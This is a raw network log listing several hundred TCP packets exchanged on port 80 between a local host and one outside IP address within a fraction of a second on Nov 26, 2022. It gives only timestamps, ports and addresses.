Nov 26, 2022 11:17:40.051253080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.051284075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.051315069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.051331043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.051354885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.051409960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.052020073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.052051067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.052082062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.052114010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.052122116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.052161932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.052179098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.052206039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.052237988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.052259922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.052282095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.052318096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.052337885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.052362919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.052417040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.052994967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.053025961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.053056002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.053080082 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.053101063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.053134918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.053153038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.053180933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.053206921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.053234100 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.053551912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.053582907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.053610086 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.053628922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.053664923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.053683043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.053709984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.053741932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.053757906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.053786993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.053818941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.053833961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.053864002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.053895950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.053913116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.054522991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.054553986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.054584026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.054595947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.054632902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.054636002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.054693937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.054724932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.054744959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.054769993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.054805040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.054821968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.054852009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.054904938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.054903984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.055510998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.055543900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.055565119 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.055589914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.055628061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.055639029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.055671930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.055702925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.055717945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.055747986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.055779934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.055795908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.055825949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.055857897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.055874109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.056317091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.056348085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.056369066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.056391954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.056433916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.056447029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.056478977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.056513071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.056529999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.056555986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.056619883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.056642056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.056663036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.056698084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.056730032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.056735992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.056794882 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.057229996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.057260036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.057290077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.057316065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.057331085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.057368994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.057383060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.057414055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.057445049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.057465076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.057487965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.057523012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.057538033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.057569027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.057604074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.057621002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.058156967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.058187962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.058216095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.058231115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.058269024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.058284044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.058314085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.058346033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.058362961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.058389902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.058423042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.058439970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.058465958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.058500051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.058517933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.058543921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.058578014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.058597088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.059035063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059066057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059098959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059101105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.059144020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059154034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.059187889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059222937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059240103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.059513092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059545040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059571981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.059583902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059626102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059642076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.059670925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059704065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059721947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.059747934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059782028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059798956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.059828043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059859991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059879065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.059905052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059938908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.059956074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.060422897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.060455084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.060482025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.060496092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.060530901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.060548067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.060576916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.060611963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.060645103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.060655117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.060688972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.060715914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.060731888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.060782909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.060812950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.060826063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.060859919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.060866117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.061346054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.061377048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.061407089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.061423063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.061449051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.061454058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.061491966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.061523914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.061542034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.061568022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.061604023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.061614037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.061647892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.061681986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.061691999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.061727047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.061768055 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.061774015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062062979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062083960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062104940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062108040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.062140942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062161922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.062170982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062195063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062213898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.062220097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062246084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062266111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062275887 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.062295914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062315941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.062323093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062349081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062370062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.062376022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062402010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062418938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.062429905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062479973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.062489986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062516928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.062562943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.063000917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063023090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063043118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063066006 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.063066959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063095093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063116074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.063122034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063146114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063165903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.063170910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063198090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063211918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.063227892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063251972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063271046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.063277006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063302040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063319921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.063328028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063354015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063368082 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.063381910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063405991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063424110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.063950062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063971996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063992977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.063998938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.064022064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064033031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.064165115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064187050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064208031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064214945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.064237118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064256907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.064265013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064289093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064307928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.064316034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064341068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064362049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064378023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.064392090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064404964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.064429998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064450979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064469099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.064479113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064506054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064522028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.064534903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064559937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064574957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.064591885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.064637899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.065133095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.065155029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.065181971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.065192938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.065215111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.065238953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.065260887 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.065264940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.065294027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.065304995 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.065324068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.065346956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.065366983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.065373898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.065401077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.065416098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.065429926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.065453053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.065469980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.065483093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.065505981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.065527916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.065531969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.065556049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.065571070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.066509008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.066529036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.066561937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.066569090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.066616058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.066626072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.066646099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.066668034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.066679955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.066698074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.066721916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.066732883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.066752911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.066773891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.066787958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.066802979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.066828012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.066838026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.066857100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.066894054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.066896915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.066924095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.066945076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.066961050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.066975117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.067013025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.068047047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.068068027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.068089008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.068110943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.068116903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.068140984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.068145990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.068171024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.068193913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.068205118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.068223953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.068247080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.068255901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.068276882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.068310976 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.068371058 CET	80	49707	66.235.200.147	192.168.2.5
